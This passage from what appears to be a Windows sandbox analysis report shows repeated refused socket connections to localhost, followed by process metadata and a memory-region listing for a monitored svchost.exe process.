lpBuffer=0x1b3dec30, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d [0371.843] SetEvent (hEvent=0x3f0) returned 1 [0375.606] closesocket (s=0x5b4) returned 0 [0375.611] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0375.612] setsockopt (s=0x5b4, level=65535, optname=4098, optval="", optlen=4) returned 0 [0375.612] setsockopt (s=0x5b4, level=65535, optname=4097, optval="", optlen=4) returned 0 [0375.612] WSAConnect (in: s=0x5b4, name=0x222cf20*(sa_family=2, sin_port=0x1b58, sin_addr="127.0.0.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0377.934] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, lpBuffer=0x1b3dec30, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d [0377.938] SetEvent (hEvent=0x3f0) returned 1 [0386.523] closesocket (s=0x5b4) returned 0 [0386.538] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0386.544] setsockopt (s=0x5b4, level=65535, optname=4098, optval="", optlen=4) returned 0 [0386.544] setsockopt (s=0x5b4, level=65535, optname=4097, optval="", optlen=4) returned 0 [0386.544] WSAConnect (in: s=0x5b4, name=0x222e350*(sa_family=2, sin_port=0x1b58, sin_addr="127.0.0.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0389.036] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, lpBuffer=0x1b3dec30, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d [0389.041] SetEvent (hEvent=0x3f0) returned 1 [0396.788] closesocket (s=0x5b4) returned 0 [0396.812] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0396.813] setsockopt (s=0x5b4, level=65535, optname=4098, optval="", optlen=4) returned 0 [0396.813] setsockopt (s=0x5b4, level=65535, optname=4097, optval="", optlen=4) returned 0 [0396.813] WSAConnect (s=0x5b4, name=0x222f608*(sa_family=2, sin_port=0x1b58, sin_addr="127.0.0.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0) Thread: id = 414 os_tid = 0x16b0 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x406b5000" os_pid = "0x8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bdae" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1283 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1284 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1285 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1286 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1287 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1288 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1289 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1290 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1291 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1292 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1293 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1294 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1295 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1296 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1297 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1298 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1299 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1300 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1301 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1302 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 1303 start_va = 0xb20000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1304 start_va = 0xb30000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1305 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1306 start_va = 0xbc0000 end_va = 0xbc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1307 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1308 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1309 start_va = 0xbf0000 end_va = 0xbfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1310 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1311 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1312 start_va = 0xf00000 end_va = 0x1237fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1313 start_va = 0x1240000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1314 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1315 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1316 start_va = 0x1540000 end_va = 0x1540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 1317 start_va = 0x1550000 end_va = 0x155ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1318 start_va = 0x1560000 end_va = 0x1560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 1319 start_va = 0x1570000 end_va = 0x1570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001570000" filename = "" Region: id = 1320 start_va = 0x1580000 end_va = 0x1595fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1321 start_va = 0x15a0000 end_va = 0x15a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 1322 start_va = 0x15b0000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 1323 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 1324 start_va = 0x15d0000 end_va = 0x15d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1325 start_va = 0x15e0000 end_va = 0x15e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1326 start_va = 0x15f0000 end_va = 0x15fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1327 start_va = 0x1600000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1328 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1329 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1330 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1331 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1332 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1333 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1334 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1335 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1336 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1337 start_va = 0x2080000 end_va = 0x20c8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 1338 start_va = 0x20d0000 end_va = 0x216bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1339 start_va = 0x2170000 end_va = 0x217cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1340 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1341 start_va = 0x2200000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1342 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1343 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1344 start_va = 0x2580000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1345 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1346 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1347 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1348 start_va = 0x2900000 end_va = 0x297ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1349 start_va = 0x2980000 end_va = 0x2981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wldap32.dll.mui" filename = "\\Windows\\System32\\en-US\\wldap32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wldap32.dll.mui") Region: id = 1350 start_va = 0x2990000 end_va = 0x2991fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1351 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 1352 start_va = 0x29b0000 end_va = 0x29b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1353 start_va = 0x29c0000 end_va = 0x29c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 1354 start_va = 0x29d0000 end_va = 0x29d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1355 start_va = 0x29e0000 end_va = 0x29e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1356 start_va = 0x29f0000 end_va = 0x29fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1357 start_va = 0x2a00000 end_va = 0x2a01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 1358 start_va = 0x2a20000 end_va = 0x2a20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 1359 start_va = 0x2a30000 end_va = 0x2a31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1360 start_va = 0x2a40000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1361 start_va = 0x2a50000 end_va = 0x2a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1362 start_va = 0x2a60000 end_va = 0x2a60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 1363 start_va = 0x2a70000 end_va = 0x2a73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 1364 start_va = 0x2a80000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1365 start_va = 0x2b80000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 1366 start_va = 0x2c80000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 1367 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1368 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1369 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1370 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1371 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1372 start_va = 0x3200000 end_va = 0x333efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1373 start_va = 0x3340000 end_va = 0x334ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1374 start_va = 0x3350000 end_va = 0x335ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1375 start_va = 0x3360000 end_va = 0x336ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1376 start_va = 0x3370000 end_va = 0x337ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1377 start_va = 0x3380000 end_va = 0x338ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1378 start_va = 0x3390000 end_va = 0x339ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1379 start_va = 0x33a0000 end_va = 0x33affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1380 start_va = 0x33b0000 end_va = 0x33bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1381 start_va = 0x33c0000 end_va = 0x33cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1382 start_va = 0x33d0000 end_va = 0x33dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1383 start_va = 0x33e0000 end_va = 0x33effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1384 start_va = 0x33f0000 end_va = 0x33fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1385 start_va = 0x3400000 end_va = 0x340ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1386 start_va = 0x3410000 end_va = 0x341ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1387 start_va = 0x3420000 end_va = 0x342ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1388 start_va = 0x3430000 end_va = 0x343ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1389 start_va = 0x3440000 end_va = 0x3447fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wpndatabase.db-shm" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Notifications\\wpndatabase.db-shm" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\notifications\\wpndatabase.db-shm") Region: id = 1390 start_va = 0x3450000 end_va = 0x345ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1391 start_va = 0x3460000 end_va = 0x3461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1392 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 1393 start_va = 0x3500000 end_va = 0x3500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1394 start_va = 0x3510000 end_va = 0x3513fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1395 start_va = 0x3520000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 1396 start_va = 0x3540000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1397 start_va = 0x3640000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1398 start_va = 0x3740000 end_va = 0x3786fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003740000" filename = "" Region: id = 1399 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003790000" filename = "" Region: id = 1400 start_va = 0x37a0000 end_va = 0x37a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1401 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wosc.dll.mui" filename = "\\Windows\\System32\\en-US\\wosc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wosc.dll.mui") Region: id = 1402 start_va = 0x37c0000 end_va = 0x37c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1403 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shcore.dll.mui" filename = "\\Windows\\System32\\en-US\\SHCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shcore.dll.mui") Region: id = 1404 start_va = 0x37e0000 end_va = 0x37e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037e0000" filename = "" Region: id = 1405 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 1406 start_va = 0x3800000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1407 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1408 start_va = 0x3b00000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1409 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 1410 start_va = 0x3c80000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 1411 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 